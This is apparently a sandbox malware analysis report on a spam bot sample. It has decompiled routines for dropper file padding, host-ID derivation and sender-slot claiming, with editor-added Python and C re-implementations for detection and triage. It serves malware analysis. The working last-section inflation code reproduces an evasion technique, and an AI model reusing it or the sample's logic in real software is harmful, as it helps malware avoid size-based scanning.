                                                                                							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
                                                                                							_t60 = _v8;
                                                                                							if(_t59 == 0 || _t60 != _v12) {
                                                                                								break;	/* short or failed write */
                                                                                							}
                                                                                							_t68 = _t68 + _t60;	/* running total of bytes written */
                                                                                							_t41 =  &_a16;
                                                                                							 *_t41 = _a16 - 1;
                                                                                							if( *_t41 != 0) {
                                                                                								continue;
                                                                                							} else {
                                                                                								goto L13;	/* all N copies written: return total */
                                                                                							}
                                                                                							goto L18;
                                                                                						}
                                                                                						asm("sbb eax, eax");	/* short-write path: result masked from the compare above */
                                                                                						_t53 =  !_t60 & _t68 + _t60;
                                                                                					}
                                                                                				}
                                                                                				L18:
                                                                                				return _t53;
                                                                                			}

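The function above is the sample's dropper padding routine: the dropped copy is the original PE with the last section's raw bytes repeated until the file reaches a caller-chosen size, and the section header patched so the file still loads. The example below is added by the editor and is not Joe Sandbox output or the sample's own code; it re-implements the same header arithmetic and inflation in Python (in memory rather than through WriteFile) and adds the check an analyst wants next to it: detecting a last section that is one block repeated. The two-section PE skeleton it builds is constructed for the example, the names (last_section_raw_info, inflate_last_section, detect_inflated_last_section) are the editor's, and the assumption that the sample's fourth argument is the buffer length is carried over from the comments above.

```python
# Added example (editor's code, not Joe Sandbox output or the sample's own
# code): re-implements the last-section inflation performed by E00406987 and
# a check that flags a PE whose last section is a repeated block.
import hashlib
import struct

SECTION_HDR_SIZE = 0x28          # sizeof(IMAGE_SECTION_HEADER)
FILE_HDR_SIZE = 0x18             # "PE\0\0" + IMAGE_FILE_HEADER


def last_section_raw_info(pe: bytes):
    """Same pointer arithmetic as the decompiled code: returns the offset of the
    last IMAGE_SECTION_HEADER plus its SizeOfRawData and PointerToRawData."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 0x14)[0]
    hdr = e_lfanew + FILE_HDR_SIZE + opt_size + (num_sections - 1) * SECTION_HDR_SIZE
    raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 0x10)
    return hdr, raw_size, raw_ptr


def inflate_last_section(pe: bytes, target_size: int) -> bytes:
    """What the sample's writer does, in memory: copy everything before the
    last section once, patch that section's SizeOfRawData to repeats * original,
    then append the section's raw bytes `repeats` times. A header that points
    past the buffer or has SizeOfRawData == 0 is rejected here (the sample
    writes a truncated prefix instead)."""
    hdr, raw_size, raw_ptr = last_section_raw_info(pe)
    if raw_ptr >= len(pe) or raw_size == 0:
        raise ValueError("last section has no raw data to repeat")
    repeats = max(1, (target_size - raw_ptr) // raw_size)
    out = bytearray(pe[:raw_ptr])
    struct.pack_into("<I", out, hdr + 0x10, repeats * raw_size)
    out += pe[raw_ptr:raw_ptr + raw_size] * repeats
    return bytes(out)


def _longest_border(s: bytes) -> int:
    """Length of the longest proper prefix of s that is also a suffix
    (KMP prefix function)."""
    pi = [0] * len(s)
    k = 0
    for i in range(1, len(s)):
        while k and s[i] != s[k]:
            k = pi[k - 1]
        if s[i] == s[k]:
            k += 1
        pi[i] = k
    return pi[-1] if s else 0


def detect_inflated_last_section(pe: bytes, min_repeats: int = 2):
    """Return (period, repeats) when the last section's raw data is one block
    of `period` bytes repeated `repeats` times (repeats >= min_repeats),
    otherwise None. A section filled with a single byte value also matches
    (period 1); callers that care should require period >= FileAlignment."""
    _, raw_size, raw_ptr = last_section_raw_info(pe)
    data = pe[raw_ptr:raw_ptr + raw_size]
    if raw_size == 0 or len(data) != raw_size:
        return None                      # truncated file: nothing to judge
    period = raw_size - _longest_border(data)   # minimal period of the data
    if raw_size % period:
        return None                      # minimal period does not tile the data
    repeats = raw_size // period
    return (period, repeats) if repeats >= min_repeats else None


def build_sample_pe() -> bytes:
    """Constructed two-section PE skeleton (not a real binary): only the fields
    the offsets above touch are meaningful; section bodies are SHA-256 output
    so they are not accidentally periodic."""
    def blob(seed):                      # 16 * 32 = 0x200 bytes of aperiodic data
        return b"".join(hashlib.sha256(bytes([seed + i])).digest() for i in range(16))

    def section(name, va, size, ptr):    # IMAGE_SECTION_HEADER, 0x28 bytes
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, ptr, 0, 0, 0, 0, 0x60000020)

    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)       # PE32 magic, rest zero
    headers = (dos + b"PE\0\0" + file_hdr + opt_hdr
               + section(b".text", 0x1000, 0x200, 0x200)
               + section(b".data", 0x2000, 0x200, 0x400))
    headers += b"\0" * (0x200 - len(headers))
    return headers + blob(0) + blob(16)


if __name__ == "__main__":
    sample = build_sample_pe()
    print(detect_inflated_last_section(sample))                                # None
    print(detect_inflated_last_section(inflate_last_section(sample, 0x2000)))  # (512, 14)
```

The period test uses the KMP prefix function: the minimal period of the section is its length minus its longest border, and if that period divides the length the section is an exact repetition of its first `period` bytes. Applied to a drop produced by the routine above it returns the original SizeOfRawData as the period and N as the repeat count, which is the pair an analyst needs to recover the unpadded file (keep PointerToRawData bytes plus one period, and reset SizeOfRawData).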

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID: ,k@
                                                                                • API String ID: 3934441357-1053005162
                                                                                • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00E3B9D9
                                                                                • InterlockedIncrement.KERNEL32(00413648), ref: 00E3BA3A
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00E3BA94
                                                                                • GetTickCount.KERNEL32 ref: 00E3BB79
                                                                                • GetTickCount.KERNEL32 ref: 00E3BB99
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00E3BE15
                                                                                • closesocket.WS2_32(00000000), ref: 00E3BEB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIncrementInterlockedTick$closesocket
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 1869671989-2903620461
                                                                                • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction ID: d42af8c6b2a965ea856678458733e22e76da362947431b64bae5ca4b60480fb9
                                                                                • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction Fuzzy Hash: 6C318F7190024CDFDF25DFA9DC49AE97BF8EB44700F205066FA26A2151DB71DA85CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E00408CEE() {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				long _t15;
                                                                                				char _t17;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr* _t20;
                                                                                				void* _t25;
                                                                                				signed int _t31;
                                                                                				signed char _t35;
                                                                                				signed int _t36;
                                                                                				char* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				signed int _t45;
                                                                                				void* _t49;
                                                                                
                                                                                				_push(_t34);
                                                                                				_t31 = 0;
                                                                                				_t49 =  *0x413380 - _t31; // 0x0
                                                                                				if(_t49 == 0) {
                                                                                					L17:
                                                                                					return _t15;
                                                                                				}
                                                                                				_t15 = GetTickCount() -  *0x413388;
                                                                                				if(_t15 < 0xea60) {
                                                                                					goto L17;
                                                                                				}
                                                                                				_t41 =  *0x413380; // 0x0
                                                                                				_t17 =  *_t41;
                                                                                				_t45 =  *(_t41 + 1);
                                                                                				_t42 = _t41 + 5;
                                                                                				_v12 = _t17;
                                                                                				if(_t17 <= 0) {
                                                                                					L16:
                                                                                					_t15 = GetTickCount();
                                                                                					 *0x413388 = _t15;
                                                                                					goto L17;
                                                                                				} else {
                                                                                					_v8 = _t42;
                                                                                					do {
                                                                                						_t35 =  *_v8;
                                                                                						if(_t35 != 8) {
                                                                                							if(_t35 != 9) {
                                                                                								_t36 = _t35;
                                                                                								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
                                                                                								if(_t19 == 0) {
                                                                                									goto L12;
                                                                                								}
                                                                                								_t9 = _t19 + 0x34; // 0x3b10c483
                                                                                								if(_t36 ==  *_t9) {
                                                                                									_t13 = _t19 + 0x50; // 0x7486850
                                                                                									_t20 =  *_t13;
                                                                                									if(_t20 != 0) {
                                                                                										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
                                                                                									}
                                                                                									goto L16;
                                                                                								}
                                                                                								goto L12;
                                                                                							}
                                                                                							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
                                                                                							L8:
                                                                                							if(_t25 != 0) {
                                                                                								_t6 = _v8 + 1; // 0x3cc6
                                                                                								_t45 = _t45 |  *_t6;
                                                                                							}
                                                                                							goto L12;
                                                                                						}
                                                                                						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
                                                                                						goto L8;
                                                                                						L12:
                                                                                						_v8 = _v8 + 5;
                                                                                						_t31 = _t31 + 1;
                                                                                					} while (_t31 < _v12);
                                                                                					goto L16;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				signed int _t29;
                                                                                				intOrPtr _t43;
                                                                                				intOrPtr _t45;
                                                                                				intOrPtr _t50;
                                                                                
                                                                                				if(_a8 <= 0) {
                                                                                					L14:
                                                                                					return _t29;
                                                                                				}
                                                                                				_t29 = E004030FA(0x412c00);
                                                                                				_v8 = 0;
                                                                                				if(_a8 <= 0) {
                                                                                					L13:
                                                                                					 *0x412c00 =  *0x412c00 & 0x00000000;
                                                                                					goto L14;
                                                                                				} else {
                                                                                					do {
                                                                                						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
                                                                                						_t45 =  *((intOrPtr*)(_t50 - 0x24));
                                                                                						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
                                                                                							_t10 = _t50 - 0x1c;
                                                                                							 *_t10 =  *(_t50 - 0x1c) - 1;
                                                                                							if( *_t10 < 0) {
                                                                                								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
                                                                                							}
                                                                                							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
                                                                                						}
                                                                                						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
                                                                                						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
                                                                                							_t43 = 2;
                                                                                							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
                                                                                							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
                                                                                							_t34 =  *((intOrPtr*)(_t45 + 0x10));
                                                                                							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
                                                                                								 *((intOrPtr*)(_t45 + 8)) = _t43;
                                                                                								if( *0x412bfc == 0) {
                                                                                									E00406509(_t34);
                                                                                									 *0x412bfc = 1;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_v8 = _v8 + 1;
                                                                                						_t29 = _v8;
                                                                                					} while (_t29 < _a8);
                                                                                					goto L13;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                  • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 3716169038-2903620461
                                                                                • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00E370BC
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 00E370F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID: |
                                                                                • API String ID: 2370142434-2343686810
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: fdbb513525b7c7cb9642446e38ae0d3d1ac283c73ed57f78c06feba0e630109d
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: 27113CB390511CEBDF21CFD4DC88ADEBBBCAB04305F1451A6E541F6090D6709B88CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 60%
                                                                                 			E00401B71() {
                                                                                 				/* Derives a 31-bit per-host identifier from three machine properties. */
                                                                                 				long _v8;
                                                                                 				long _v12;
                                                                                 				void* _v27;
                                                                                 				char _v28;
                                                                                 				signed int _t12;
                                                                                 				signed int _t28;
                                                                                 
                                                                                 				/* Zero a 16-byte computer-name buffer starting at _v28 (byte store, 3x stosd, stosw, stosb);
                                                                                 				 * _v8 = 0 clears the slot that later receives the volume serial number. */
                                                                                 				_v28 = 0;
                                                                                 				asm("stosd");
                                                                                 				asm("stosd");
                                                                                 				asm("stosd");
                                                                                 				asm("stosw");
                                                                                 				_v8 = 0;
                                                                                 				asm("stosb");
                                                                                 				_v12 = 0xf;                                   /* nSize = MAX_COMPUTERNAME_LENGTH (15) */
                                                                                 				_t12 = E00401AC3();                           /* resolves Iphlpapi!GetAdaptersAddresses; presumably returns an adapter-derived value */
                                                                                 				GetComputerNameA( &_v28,  &_v12);
                                                                                 				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); /* NULL root path: serial number of the current directory's volume into _v8 */
                                                                                 				/* _v28 is read here as the first DWORD of the computer name; the decompiler's "char" type is too narrow. */
                                                                                 				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;      /* clear the sign bit */
                                                                                 				_v8 = _t28;
                                                                                 				if(_t28 == 0) {
                                                                                 					return E0040ECA5() & 0x7fffffff;          /* fallback when the XOR collapses to zero */
                                                                                 				}
                                                                                 				return _t28;
                                                                                 			}
                                                                                 
                                                                                 Addresses (one per statement of the listing above; 0x00000000 marks a line with no own address): 0x00401b7e 0x00401b84 0x00401b85 0x00401b86 0x00401b87 0x00401b89 0x00401b8c 0x00401b8d 0x00401b94 0x00401ba3 0x00401bb8 0x00401bc8 0x00401bca 0x00401bcd 0x00000000 0x00401bd8 0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32 ref: 00401BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2777991786-1857712256
                                                                                • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
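
The identifier computation in E00401B71 is small enough to reproduce for triage, so that an analyst who knows a machine's NetBIOS name, volume serial and the value E00401AC3 produced can recompute the ID the bot would have reported. The following C is an added example written for this report, not code from the sample: the Win32 calls are replaced by plain inputs, the name of the third operand (adapter_value) and the assumption that E00401AC3 returns an adapter-derived value are the editor's, and the sample values in main are constructed.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/*
 * Re-implementation of the ID derivation in E00401B71 (added example).
 *   computer_name  - NetBIOS name as GetComputerNameA would return it
 *   volume_serial  - value GetVolumeInformationA stores in _v8
 *   adapter_value  - stand-in for the return value of E00401AC3 (assumption:
 *                    derived from GetAdaptersAddresses output)
 *   fallback       - stand-in for E0040ECA5(), used only when the XOR is zero
 */

/* First four bytes of the zero-filled 16-byte name buffer, read little-endian,
 * exactly as the sample reads _v28 as a DWORD. Names shorter than four
 * characters are NUL-padded because the buffer is cleared beforehand. */
static uint32_t name_dword(const char *computer_name)
{
    uint8_t buf[16] = {0};
    size_t n = strlen(computer_name);
    if (n > 15)                       /* nSize = 0xf */
        n = 15;
    memcpy(buf, computer_name, n);
    return (uint32_t)buf[0]        | ((uint32_t)buf[1] << 8) |
           ((uint32_t)buf[2] << 16) | ((uint32_t)buf[3] << 24);
}

uint32_t derive_host_id(const char *computer_name, uint32_t volume_serial,
                        uint32_t adapter_value, uint32_t fallback)
{
    uint32_t id = (name_dword(computer_name) ^ volume_serial ^ adapter_value)
                  & 0x7fffffff;       /* sign bit cleared, as in the sample */
    if (id == 0)
        id = fallback & 0x7fffffff;   /* E0040ECA5() & 0x7fffffff */
    return id;
}

int main(void)
{
    /* Constructed inputs; none of these values come from the report. */
    uint32_t id = derive_host_id("DESKTOP-AB12", 0x1234abcd, 0x00aabbcc, 0x99999999);
    printf("host id: %08x\n", id);
    return 0;
}
```

Two properties worth noting when hunting with this: the ID depends only on the first four characters of the host name, so hosts sharing a naming prefix differ only through the volume serial and adapter value, and the result is never zero, because the fallback path also masks to 31 bits.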

                                                                                C-Code - Quality: 100%
                                                                                 			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
                                                                                 				/* _a4: array of _a8 slot pointers; _a12: new state byte; _a16: name to store; _a20: flag byte.
                                                                                 				 * Every slot with state 1 (+0x10) and an empty name (+0x12) is claimed; there is no early exit. */
                                                                                 				void* _t15;
                                                                                 				long _t17;
                                                                                 				signed int _t29;
                                                                                 				long* _t31;
                                                                                 
                                                                                 				_t29 = 0;
                                                                                 				if(_a8 > 0) {
                                                                                 					do {
                                                                                 						_t31 = _a4 + _t29 * 4;
                                                                                 						_t17 =  *_t31;
                                                                                 						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
                                                                                 							 *((char*)(_t17 + 0x11)) = _a20;
                                                                                 							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);          /* at most 0x3d characters plus NUL into +0x12..+0x4f */
                                                                                 							 *((char*)( *_t31 + 0x4f)) = 0;                /* last byte of the name field; already NUL after lstrcpynA */
                                                                                 							 *((char*)( *_t31 + 0x10)) = _a12;
                                                                                 							if( *((char*)( *_t31 + 0x10)) != 2) {
                                                                                 								_t17 = InterlockedIncrement(0x413640);   /* global counter for states other than 2 */
                                                                                 							} else {
                                                                                 								_t17 = InterlockedIncrement(0x41363c);   /* global counter for state 2 */
                                                                                 							}
                                                                                 						}
                                                                                 						_t29 = _t29 + 1;
                                                                                 					} while (_t29 < _a8);
                                                                                 					return _t17;
                                                                                 				}
                                                                                 				return _t15;                                              /* uninitialised when _a8 <= 0; decompiler artefact */
                                                                                 			}
                                                                                 
                                                                                 Addresses (one per statement of the listing above; 0x00000000 marks a line with no own address): 0x0040ab85 0x0040ab8a 0x0040ab94 0x0040ab97 0x0040ab9a 0x0040aba0 0x0040abab 0x0040abb9 0x0040abc4 0x0040abca 0x0040abd3 0x0040abe1 0x0040abd5 0x0040abe1 0x0040abe1 0x0040abe1 0x0040abe3 0x0040abe4 0x00000000 0x0040abea 0x0040abed

                                                                                APIs
                                                                                • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlockedlstrcpyn
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 224340156-2903620461
                                                                                • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
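
The offsets E0040AB81 touches (state byte at +0x10, flag byte at +0x11, a 0x3e-byte name field at +0x12..+0x4f) describe the record layout the sample keeps per slot, and the bounded lstrcpynA plus the explicit NUL at +0x4f are what keep the copy from overrunning it. The C below is an added example that models that layout and the claim loop so the bounds can be checked on a constructed table; it is not the sample's code. Field names, the meaning of state values 1 and 2, and the replacement of InterlockedIncrement by plain counters (the example is single-threaded) are the editor's assumptions; only the offsets and sizes come from the listing.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Slot record implied by the offsets in E0040AB81. Field names are assumed. */
typedef struct {
    uint8_t unknown[0x10];   /* +0x00..+0x0f: not touched by this routine */
    char    state;           /* +0x10: 1 = free (assumed), 2 = counted separately */
    char    flag;            /* +0x11: copied from the fifth argument */
    char    name[0x3e];      /* +0x12..+0x4f: bounded copy of the fourth argument */
} slot_t;

/* Stand-ins for the counters at 0x41363c and 0x413640. */
static long g_count_state2 = 0;   /* InterlockedIncrement(0x41363c) */
static long g_count_other  = 0;   /* InterlockedIncrement(0x413640) */

/* lstrcpynA semantics: copy at most n-1 characters and always NUL-terminate. */
static void lstrcpyn_a(char *dst, const char *src, size_t n)
{
    size_t i = 0;
    for (; i + 1 < n && src[i] != '\0'; i++)
        dst[i] = src[i];
    dst[i] = '\0';
}

/* Mirror of E0040AB81(slots, count, new_state, name, flag).
 * Returns how many slots were claimed (the sample returns a scratch value). */
int claim_free_slots(slot_t **slots, int count, char new_state,
                     const char *name, char flag)
{
    int claimed = 0;
    for (int i = 0; i < count; i++) {
        slot_t *s = slots[i];
        /* Only a free slot whose name is still empty is taken; no break. */
        if (s->state != 1 || s->name[0] != '\0')
            continue;
        s->flag = flag;
        lstrcpyn_a(s->name, name, 0x3e);  /* 0x3d characters at most */
        s->name[0x3d] = '\0';             /* the write at +0x4f (0x4f - 0x12) */
        s->state = new_state;
        if (s->state != 2)
            g_count_other++;
        else
            g_count_state2++;
        claimed++;
    }
    return claimed;
}

/* Constructed three-slot table for the demonstration. */
slot_t  g_demo[3];
slot_t *g_demo_tbl[3] = { &g_demo[0], &g_demo[1], &g_demo[2] };

/* Resets the table and counters, then claims with state 2 and an over-long name. */
int run_demo(void)
{
    char longname[0x60];
    memset(g_demo, 0, sizeof g_demo);
    g_count_state2 = 0;
    g_count_other  = 0;
    g_demo[0].state = 1;                            /* free and unnamed: claimed */
    g_demo[1].state = 1; g_demo[1].name[0] = 'x';   /* free but already named: skipped */
    g_demo[2].state = 0;                            /* not free: skipped */
    memset(longname, 'A', sizeof longname - 1);     /* 0x5f chars, longer than the field */
    longname[sizeof longname - 1] = '\0';
    return claim_free_slots(g_demo_tbl, 3, 2, longname, 7);
}

int main(void)
{
    int n = run_demo();
    printf("claimed %d slot(s); stored name length %zu; state-2 counter %ld\n",
           n, strlen(g_demo[0].name), g_count_state2);
    return 0;
}
```

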